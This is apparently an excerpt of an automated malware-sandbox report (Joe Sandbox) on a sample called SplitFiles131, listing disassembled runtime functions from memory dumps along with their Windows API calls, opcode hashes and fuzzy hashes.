                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: 9e517827ee14b2795f6c39b1ac259b67fb15a98946d76ce23e4192bd4712f48a
                                          • Instruction ID: bdb844541333acea6d7cc9b38086a4600084955ffe6c4e25b5f0fe259d46e886
                                          • Opcode Fuzzy Hash: 9e517827ee14b2795f6c39b1ac259b67fb15a98946d76ce23e4192bd4712f48a
                                          • Instruction Fuzzy Hash: E4B0483200020CBB8F021F82EC048993F2AFB08260B448420FA180502087729522AB84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041CB63: GetLastError.KERNEL32(?,?,?,00413661,?,00000000,00405D9E,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000), ref: 0041CB68
                                            • Part of subcall function 0041CB63: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000,?,00405D9E,?), ref: 0041CC06
                                          • GetACP.KERNEL32(?,?,?,?,?,?,0041B763,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00426E60
                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0041B763,?,?,?,00000055,?,-00000050,?,?), ref: 00426E8B
                                          • _wcschr.LIBVCRUNTIME ref: 00426F1F
                                          • _wcschr.LIBVCRUNTIME ref: 00426F2D
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00426FEE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                          • String ID: utf8$)C
                                          • API String ID: 4147378913-3322961178
                                          • Opcode ID: 20ef76e225b801900a59ab0872716af096e09f6a96c791c1d4433a4f633c1a20
                                          • Instruction ID: eed4488de9b567759dd5ff52785522d47d8f7e060e054a56165183b34d5168a2
                                          • Opcode Fuzzy Hash: 20ef76e225b801900a59ab0872716af096e09f6a96c791c1d4433a4f633c1a20
                                          • Instruction Fuzzy Hash: 2C711935B00222AADB24AF35ED42BB773A8EF44704F56406BF905D7281EB7CE941875D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041CB63: GetLastError.KERNEL32(?,?,?,00413661,?,00000000,00405D9E,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000), ref: 0041CB68
                                            • Part of subcall function 0041CB63: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000,?,00405D9E,?), ref: 0041CC06
                                            • Part of subcall function 0041CB63: _free.LIBCMT ref: 0041CBC5
                                            • Part of subcall function 0041CB63: _free.LIBCMT ref: 0041CBFB
                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0042780C
                                          • IsValidCodePage.KERNEL32(00000000), ref: 00427855
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00427864
                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 004278AC
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004278CB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                          • String ID: )C
                                          • API String ID: 949163717-1336023901
                                          • Opcode ID: d6733786ce1444d89c0ece45410b3c14b7f86884eb63135eb5ebf69e9976cec0
                                          • Instruction ID: 8ad3d2252febc303d5905dee770c0fca35b5db36d8f6aca9aad01a9d0ac59951
                                          • Opcode Fuzzy Hash: d6733786ce1444d89c0ece45410b3c14b7f86884eb63135eb5ebf69e9976cec0
                                          • Instruction Fuzzy Hash: 74518671B042259BDB10EF65EC45EBF73B8EF44700F94447AE900E7250E7789944CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,2000000B,IxB,00000002,00000000,?,?,?,00427849,?,00000000), ref: 004275C4
                                          • GetLocaleInfoW.KERNEL32(00000000,20001004,IxB,00000002,00000000,?,?,?,00427849,?,00000000), ref: 004275ED
                                          • GetACP.KERNEL32(?,?,00427849,?,00000000), ref: 00427602
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$IxB$OCP
                                          • API String ID: 2299586839-4141542707
                                          • Opcode ID: d473ddd763a2c2c897fe5dcf6db478f1cae410dc6a90a74f6531b1057af5c91b
                                          • Instruction ID: 80627bc4f1190bcbfed89345fe7bf2f4b32af40f38ec4df066e79ffa23b7ef9e
                                          • Opcode Fuzzy Hash: d473ddd763a2c2c897fe5dcf6db478f1cae410dc6a90a74f6531b1057af5c91b
                                          • Instruction Fuzzy Hash: B821B832709121BAD734CF18E901A97F3A6EB54B60BD68476E909D7600E735DE81C35C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040F601
                                          • IsDebuggerPresent.KERNEL32 ref: 0040F6CD
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040F6ED
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0040F6F7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: b905c57fb93a7ea2142a1a6e2d5c4873a38ca60d89c803f25540929c33dac397
                                          • Instruction ID: e08a22daeabf917fd0aba5c617d7a5f2469330a7746797e8074d373f0119b78b
                                          • Opcode Fuzzy Hash: b905c57fb93a7ea2142a1a6e2d5c4873a38ca60d89c803f25540929c33dac397
                                          • Instruction Fuzzy Hash: 7131FA75D052189BDB20DFA5D989BCDBBB8BF08304F1041BAE409A7290EB755A89CF49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10003AE0
                                          • IsDebuggerPresent.KERNEL32 ref: 10003BAC
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10003BCC
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 10003BD6
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: 87d6071aa85ca3aceb4d5d49843fcbf5a144f8cfc35fef28e923873c0919a720
                                          • Instruction ID: 6c05d683b9c83b65af34da63d054ec9b8364850d5d560307e6d3fdc6a332805a
                                          • Opcode Fuzzy Hash: 87d6071aa85ca3aceb4d5d49843fcbf5a144f8cfc35fef28e923873c0919a720
                                          • Instruction Fuzzy Hash: 7E311875D052189BEB11DFA4D989BCDBBB8EF08344F1080AAE54CAB254EB719A848F05
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00413463
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0041346D
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0041347A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 08f293217c44ab737df140b6d3b84d0e147ad2ade69c0ac62fd1d43b73898614
                                          • Instruction ID: eed5281d3674d54920691af3d978e0505281e735928a2e98dc149aff2d4c60b5
                                          • Opcode Fuzzy Hash: 08f293217c44ab737df140b6d3b84d0e147ad2ade69c0ac62fd1d43b73898614
                                          • Instruction Fuzzy Hash: 9131C4749012289BCB21DF69DC89BDDBBB4BF08714F5041EAE41CA7290E7749B858F49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10006278
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 10006282
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 1000628F
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 9a692d0d77a07a7f37119dcdd5ace2a3b37eeee0a1bfcb31a8054ad36fdd368c
                                          • Instruction ID: abb11d6b70c581ee1350689d9832688372e2db19cf6905fbf3b29f181f2760c3
                                          • Opcode Fuzzy Hash: 9a692d0d77a07a7f37119dcdd5ace2a3b37eeee0a1bfcb31a8054ad36fdd368c
                                          • Instruction Fuzzy Hash: F431C4749012289BDB21DF68DC89BCDBBB8FF08350F5041EAE41CA7251EB709B858F45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32(10007C68,?,10006CE0,10002482,?,10007C68,10002482,10007C68), ref: 10006D03
                                          • TerminateProcess.KERNEL32(00000000,?,10006CE0,10002482,?,10007C68,10002482,10007C68), ref: 10006D0A
                                          • ExitProcess.KERNEL32 ref: 10006D1C
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: b48507955d557410ab621ea9767185c5b28cf2fcba806ca0d5141bf90050bc88
                                          • Instruction ID: 8090ae278696ef8d63f7159b1b54225b98daf67b6e3b66e302f5d8a45b402e03
                                          • Opcode Fuzzy Hash: b48507955d557410ab621ea9767185c5b28cf2fcba806ca0d5141bf90050bc88
                                          • Instruction Fuzzy Hash: 6EE08C31600148AFEB12EF60CD48B493B6AFB092C1F208415F8058A131CBB6ED91CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040F809
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FeaturePresentProcessor
                                          • String ID:
                                          • API String ID: 2325560087-0
                                          • Opcode ID: af8edf595f28d6e0de3f7c832e975c9ce316b7f81847fa13e3e8cff5d50537ce
                                          • Instruction ID: 442fd19c12fe52d52473a448f085702681ee7344cd8d47f004f5f7bce1392ef5
                                          • Opcode Fuzzy Hash: af8edf595f28d6e0de3f7c832e975c9ce316b7f81847fa13e3e8cff5d50537ce
                                          • Instruction Fuzzy Hash: 825159B2A102199BEB29CF59D9857AABBF0FB48314F14843BD405EB791E378D904CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7fc7f42db509279383e3cc01eb7112f14e58f64f47ca781cad5004ddb32a561f
                                          • Instruction ID: 190f8b4917172ce852a4c6c2ee3eb9eeabb4d9f649594b05df5e9f634885cc74
                                          • Opcode Fuzzy Hash: 7fc7f42db509279383e3cc01eb7112f14e58f64f47ca781cad5004ddb32a561f
                                          • Instruction Fuzzy Hash: 92E08C72A11278EBCB15EB89D90498AF3FCEB45B18B95449BBA05D3201C278DE40DBE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ca6e8abd497ec3a1c156abf087cd513271e0a7e0f941d3f632673506c1267ca
                                          • Instruction ID: c2f19552910a0c3bc7347bbf13de0f87239dfd182ffd37263a02f476a58fa8e8
                                          • Opcode Fuzzy Hash: 2ca6e8abd497ec3a1c156abf087cd513271e0a7e0f941d3f632673506c1267ca
                                          • Instruction Fuzzy Hash: 3AE08C72911238EBCB24DF89DA0499AF3ECEB44B55B51449BF901F3200C6B4DE00C7E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5142b2ecf730a3c36b94ed0dd87861f2f8d441af9f974cc276bfbc499525e151
                                          • Instruction ID: 28c602149d0e72d51d161a6ecb967c1a520d45018b1f8e98f239418fe4463083
                                          • Opcode Fuzzy Hash: 5142b2ecf730a3c36b94ed0dd87861f2f8d441af9f974cc276bfbc499525e151
                                          • Instruction Fuzzy Hash: 5AE0EC72A11228EBCB15DB98D95498AB7ECFB49B90B1545AAB511D3215C270DE01C7D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b2bf1e3dbd56a5e62411fbd5e71e5e7a82189cacba0b21ec395735c552563347
                                          • Instruction ID: 16c2de7a8d20c9c44f0cfcec9700f4c07f8ea1dcaa74a4bc5a03d74aca8627af
                                          • Opcode Fuzzy Hash: b2bf1e3dbd56a5e62411fbd5e71e5e7a82189cacba0b21ec395735c552563347
                                          • Instruction Fuzzy Hash: 22E04F31000108EBDF216F94CE8DA493B29FB40345F000469FE04AA671CB79DC91DA48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID:
                                          • API String ID: 2509303402-0
                                          • Opcode ID: c55eede84f28e057531605bdedab24d4a33e5c8ac86e8fc84041852ef0a9f38b
                                          • Instruction ID: b3dde5999e6bd8c58c9687087de5c6fa98508f20abd658152064e8f8f6389a2c
                                          • Opcode Fuzzy Hash: c55eede84f28e057531605bdedab24d4a33e5c8ac86e8fc84041852ef0a9f38b
                                          • Instruction Fuzzy Hash: 4FD1A0719002059FEB15CFA5C891BEEB7F5BF08304F14456EE899A7382D778AC85CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 00443383
                                          • ___free_lconv_mon.LIBCMT ref: 0044338E
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442ED2
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442EE4
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442EF6
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F08
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F1A
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F2C
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F3E
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F50
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F62
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F74
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F86
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442F98
                                            • Part of subcall function 00442EB5: _free.LIBCMT ref: 00442FAA
                                          • _free.LIBCMT ref: 004433A5
                                          • _free.LIBCMT ref: 004433BA
                                          • _free.LIBCMT ref: 004433C5
                                          • _free.LIBCMT ref: 004433E7
                                          • _free.LIBCMT ref: 004433FA
                                          • _free.LIBCMT ref: 00443408
                                          • _free.LIBCMT ref: 00443413
                                          • _free.LIBCMT ref: 0044344B
                                          • _free.LIBCMT ref: 00443452
                                          • _free.LIBCMT ref: 0044346F
                                          • _free.LIBCMT ref: 00443487
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$___free_lconv_mon
                                          • String ID:
                                          • API String ID: 3658870901-0
                                          • Opcode ID: a944ca6634b5d74932c30d559000e04cde607573212888ef64c986212d955d2d
                                          • Instruction ID: ce84940d4ec221c3e00cea4fbe0e61062730256890f47c7b2aa3b88f8ab69c0d
                                          • Opcode Fuzzy Hash: a944ca6634b5d74932c30d559000e04cde607573212888ef64c986212d955d2d
                                          • Instruction Fuzzy Hash: 28314E31600601AEFB219E3AD845B9B77E4AF01B15F14881FE455D72A1DF78EE818B1C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 004263CA
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 0042564F
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 00425661
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 00425673
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 00425685
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 00425697
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 004256A9
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 004256BB
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 004256CD
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 004256DF
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 004256F1
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 00425703
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 00425715
                                            • Part of subcall function 00425632: _free.LIBCMT ref: 00425727
                                          • _free.LIBCMT ref: 004263BF
                                            • Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
                                            • Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0
                                          • _free.LIBCMT ref: 004263E1
                                          • _free.LIBCMT ref: 004263F6
                                          • _free.LIBCMT ref: 00426401
                                          • _free.LIBCMT ref: 00426423
                                          • _free.LIBCMT ref: 00426436
                                          • _free.LIBCMT ref: 00426444
                                          • _free.LIBCMT ref: 0042644F
                                          • _free.LIBCMT ref: 00426487
                                          • _free.LIBCMT ref: 0042648E
                                          • _free.LIBCMT ref: 004264AB
                                          • _free.LIBCMT ref: 004264C3
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 88f30a99e55331c7f508eb551a6b5f58649f1248a518a039e11fef256e7b3f57
                                          • Instruction ID: e81e40b5f298d664f8950b5869667bb163734d9678a7409bf98161f4c1fe4a14
                                          • Opcode Fuzzy Hash: 88f30a99e55331c7f508eb551a6b5f58649f1248a518a039e11fef256e7b3f57
                                          • Instruction Fuzzy Hash: D33162316006149FEB24AA7AE845B9BB3E8AF00314F91456FE899D7291DF7CEC80C71C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 1000AEF7
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000B9BA
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000B9CC
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000B9DE
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000B9F0
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA02
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA14
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA26
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA38
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA4A
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA5C
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA6E
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA80
                                            • Part of subcall function 1000B99D: _free.LIBCMT ref: 1000BA92
                                          • _free.LIBCMT ref: 1000AEEC
                                            • Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
                                            • Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729
                                          • _free.LIBCMT ref: 1000AF0E
                                          • _free.LIBCMT ref: 1000AF23
                                          • _free.LIBCMT ref: 1000AF2E
                                          • _free.LIBCMT ref: 1000AF50
                                          • _free.LIBCMT ref: 1000AF63
                                          • _free.LIBCMT ref: 1000AF71
                                          • _free.LIBCMT ref: 1000AF7C
                                          • _free.LIBCMT ref: 1000AFB4
                                          • _free.LIBCMT ref: 1000AFBB
                                          • _free.LIBCMT ref: 1000AFD8
                                          • _free.LIBCMT ref: 1000AFF0
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: c4e98949ab35aafe9e56d21f341b4b46aaaa1c26fbfc12bf4678de360067af1f
                                          • Instruction ID: 98d3de5cb3a98999ebd56d36befb0731ec5fbc7688b04e9877a88235aa96296e
                                          • Opcode Fuzzy Hash: c4e98949ab35aafe9e56d21f341b4b46aaaa1c26fbfc12bf4678de360067af1f
                                          • Instruction Fuzzy Hash: 0A3157726046069FFB21DAB9D881B6A73E9FF013D0F614529E099D6199DE35FE808B20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: d1ccfb6d5d4b89e14be0686283f280dc6ec478f279d77e8c09b8cbf74dc5944d
                                          • Instruction ID: 569e6a71d5f44d06fa27ae0c400f08ba275592510054ad0f9e67e0790a3e9e44
                                          • Opcode Fuzzy Hash: d1ccfb6d5d4b89e14be0686283f280dc6ec478f279d77e8c09b8cbf74dc5944d
